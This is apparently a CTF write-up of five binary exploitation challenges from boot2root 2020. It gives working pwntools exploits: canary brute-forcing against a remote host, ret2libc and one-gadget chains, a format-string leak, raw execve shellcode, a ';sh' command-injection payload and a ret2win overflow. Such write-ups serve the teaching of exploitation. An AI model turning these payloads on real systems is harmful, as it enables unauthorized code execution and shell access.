boot2root 2020 pwn writeup

boot2root 2020

Sun, 06 Dec. 2020, 17:30 CST — Mon, 07 Dec. 2020, 17:30 CST

bobby_boi (493pt)

Description

My boi bobby claims to be the new MC, do you have the bars to defeat him in a rap battle? Bobby will need the length of your bars beforehand tho.

nc 35.238.225.156 1002

Author: Viper_S

Attachment

bobby_boi

Analysis

og_bars is used as the static canary in this challenge,

c

char og_bars[BAR_SIZE];

void read_og_bars(){
    FILE *f = fopen("og_bars.txt", "r");
    if(f == NULL){
        printf("The OG bars are missing, either run the binary on the server or contact admin.\n");
        exit(0);
    }
    fread(og_bars, sizeof(char), BAR_SIZE, f);
    fclose(f);
}

and Stack Smashing Detected will be triggered while og_bars modified.

c

if(memcmp(bars, og_bars, BAR_SIZE)){
    printf("*** Stack Smashing Detected ***: The og bars were tampered with.\n");
    exit(-1);
}

NOTE: Stack Smashing Detected will NOT be triggered if we overwrite og_bar to the right value.

Here are two bof in this challenge :

c

void rap_battle(){
    char bars[BAR_SIZE];
    char buf[MAXLEN];
    char bar_len[MAXLEN];
    int count, x=0;

    memcpy(bars, og_bars, BAR_SIZE);
    puts("Can you defeat bobby in a rap battle?\n");
    printf("What's the size of your bars?\n");
    while(x<MAXLEN){
        read(0, bar_len+x, 1);
        if (bar_len[x] == '\n') break;
        x++;
    }
    sscanf(bar_len, "%d", &count);

    puts("Spit your bars here: ");

    read(0, buf, count);
    gets(buf);

    if(memcmp(bars, og_bars, BAR_SIZE)){
        printf("*** Stack Smashing Detected ***: The og bars were tampered with.\n");
        exit(-1);
    }
    fflush(stdout);
}

Solution

We can use read(0, buf, count) to brute force the static canary.

python

#!/usr/bin/python
#coding=utf-8
#__author__:TaQini

from pwn import *
from sys import argv

local_file  = './bobby_boi'
local_libc  = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = local_libc # '../libc.so.6'

elf = ELF(local_file)

# context.log_level = 'debug'
context.arch = elf.arch

def bf(og_bar,c):
    se      = lambda data               :p.send(data) 
    sa      = lambda delim,data         :p.sendafter(delim, data)
    sl      = lambda data               :p.sendline(data)
    sla     = lambda delim,data         :p.sendlineafter(delim, data)
    sea     = lambda delim,data         :p.sendafter(delim, data)
    rc      = lambda numb=4096          :p.recv(numb)
    ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
    uu32    = lambda data               :u32(data.ljust(4, '\0'))
    uu64    = lambda data               :u64(data.ljust(8, '\0'))
    info_addr = lambda tag, addr        :p.info(tag + ': {:#x}'.format(addr))

    # p = process(local_file)
    p = remote('35.238.225.156',1002)

    payload = 'A'*36+og_bar+c
    sla('What\'s the size of your bars?\n',str(len(payload)))
    sea('Spit your bars here: \n',payload)
    sl('')
    try:
        data = rc()
        print data
        p.close()
        return -1
    except Exception as e:
        print 'good'
        p.close()
        return c

og_bar = ''
if(len(argv)>1):
    og_bar = argv[1]
table = ' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\n'
while len(og_bar)<=8:
    for c in table:
        res = bf(og_bar,c)
        print 'trying',og_bar+c
        if res != -1:
            og_bar += c
            break
            # pause()
print 'og_bar:', og_bar

after we know the canary, we can easily solve it by ret2libc.

python

main = 0x000000000040134B

# leak libc and back to main
payload = 'A'*36+'-V1p3R_$'
sla('What\'s the size of your bars?\n',str(len(payload)))
sea('Spit your bars here: \n',payload)
debug()
payload += cyclic(12)
payload += p64(prdi) + p64(elf.got['fopen'])
payload += p64(elf.sym['puts'])
payload += p64(main)
sl(payload)

fopen = uu64(rc(6))
libcbase = fopen - libc.sym['fopen']

og = [283174,283258,983908,987655]

# one gadget
payload = 'A'*36+'-V1p3R_$'
sla('What\'s the size of your bars?\n',str(len(payload)))
sea('Spit your bars here: \n',payload)
payload += cyclic(12)
payload += p64(libcbase+og[0])
sl(payload)

flag: b00t2root{y3Ah_Ye4h_b0bbY_b0y_H3_B3_f33l1n_H1m5elf_SG9taWNpZGU=}

More

you can download full exp from my github

canned (491pt)

Description

I think i got my flag stuck in a can, can you open it for me

nc 35.238.225.156 1007

Author: Viper_S

Attachment

canned

Analysis

No PIE, leak libc and canary then ret2libc

Solution

python

prdi = 0x00000000004012bb # pop rdi ; ret

sla('Say something please\n','%15$p%17$p')
canary = int(rc(len('0xb12bbce59c5ee300')),16)
libcbase = int(rc(len('0x7f19e320d0b3')),16) - 0x21bf7

sh = libc.search('/bin/sh').next() + libcbase
system = libc.sym['system'] + libcbase

payload = cyclic(24)
payload += p64(canary)
payload += p64(0xdeadbeef)
payload += p64(prdi+1)
payload += p64(prdi) + p64(sh)
payload += p64(system)

sl(payload)

More

you can download full exp from my github

shellCode (477pt) & Shellcode loooong (495pt)

Description

I dont like long long shellcodes keep them short and crispy

nc 35.238.225.156 1008

Author: TheBadGuy

Attachment

shellcode, shellcode

Analysis

no canary, stack is executable and buf address is leaked, so we can jump to shellcode in the buf

Solution

python

ru('ed to[')
buf = int(ru(']'),16)

sc = "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"

offset = 24
payload = 'A'*offset
payload += p64(buf+24+8)
payload += sc

sl(payload)

More

you can download full exp from my github

Roppy ropper (467pt)

Description

I love ropes do you?

nc 35.238.225.156 1004

Author: TheBadGuy

Attachment

lsass

Analysis

statically linked:

bash

% ldd lsass 
	not a dynamic executable

run_command:

c

int __cdecl run_command(char a1){
  char v2; // [esp+6h] [ebp-12h]
  snprintf(&v2, 7, "ls %s", a1);
  printf("Result: %s:\n", (unsigned int)&v2);
  return system(&v2);
}

we can append sh after ls with ; to get a shell

payload: ls ;sh

Solution

bash

% nc 35.238.225.156 1004 
(list_me_like_crazy)
Is this lsass I dont understand :)
Give me your arguments:
;sh 
Result: ls ;sh:
flag.txt
lsass
cat flag.txt
b00t2root{R0p_cHa1nS_ar3_tH3_b3st}

flag: b00t2root{R0p_cHa1nS_ar3_tH3_b3st}

More

you can download full exp from my github

Welcome To Pwn (457pt)

Description

Welcome to pwn, here is an easy challenge to get you started.

nc 35.238.225.156 1001

Author: Viper_S

Attachment

welcome

Analysis

ret2win

Solution

python

offset = 152
payload = 'A'*offset
payload += p64(0x00401186)
sl(payload)
p.interactive()

More

you can download full exp from my github